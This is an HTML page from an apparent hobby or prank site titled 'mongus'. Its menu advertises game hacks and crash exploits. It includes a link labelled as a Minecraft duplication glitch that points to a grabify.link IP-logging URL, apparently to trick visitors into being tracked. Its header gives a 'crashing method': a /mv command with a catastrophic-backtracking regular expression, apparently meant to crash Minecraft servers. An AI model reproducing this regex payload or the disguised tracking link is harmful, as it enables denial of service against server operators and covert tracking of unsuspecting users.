<!DOCTYPE html>
<html lang="en-us">
<head>
  <link rel="icon" type="image/png" href="bac.jpeg">
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge">
  <meta name="theme-color" content="#00FFDF">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="sus.css">
  <title>mongus</title>
  
  </style>
</head>
<body data-new-gr-c-s-check-loaded="14.1029.0" data-gr-ext-installed="">

<style>
    body {
        margin: 0;
        font-family:'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;
        color: white;
        background-image: url('penisplant.png');
        background-repeat: no-repeat;
        background-size: cover;
        background-attachment: fixed;
    }
    
    .sidenav {
        height: 100%;
        width: 0;
        position: fixed;
        z-index: 1;
        top: 0;
        left: 0;
        background-color: lightskyblue;
        overflow-x: hidden;
        transition: 0.5s;
        padding-top: 60px;
    }
    
    .sidenav a {
        padding: 8px 8px 8px 32px;
        text-decoration: none;
        font-size: 25px;
        color: white;
        display: block;
        transition: 0.3s;
    }
    
    .sidenav a:hover {
        color: #949494;
    }
    
    .sidenav .closebtn {
        position: absolute;
        top: 0;
        right: 250px;
        font-size: 36px;
        margin-left: 50px;
    }
    
    @media screen and (max-height: 450px) {
        .sidenav {padding-top: 15px;}
        .sidenav a {font-size: 18px;}
    }
    </style>
</head>
<body data-new-gr-c-s-check-loaded="14.1029.0" data-gr-ext-installed="">
    <audio autoplay>
    <source src="doot.ogg" type="audio/ogg">
    </audio>
    <script>
    function openNav() {
        document.getElementById("mySidenav").style.width = "250px";
    }
    
    function closeNav() {
        document.getElementById("mySidenav").style.width = "0";
    }
    </script>
  <div id="mySidenav" class="sidenav">
    <a href="index.html">Home</a>
    <a href="client.html">Client</a>
    <a href="https://grabify.link/6D6ROG">Dupe for all versions of mc</a>
    <a href="abt me.html">about me</a>
    <a href="discord.html">Discord stuff</a>
    <a href="crash.html">Crash exploit</a>
    <a href="roblox.html">roblox hacks</a>

  </div>
  <span style="font-size:30px;cursor:pointer" onclick="openNav()">&#9776; </span>
  <header>
    <div class="container">
      <a id="a-title">
        <h2 class="p1">Crashing method: /mv ^(.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.*.++)$^</h2>
      </section>
    </div>
  </header>







</body>
</html>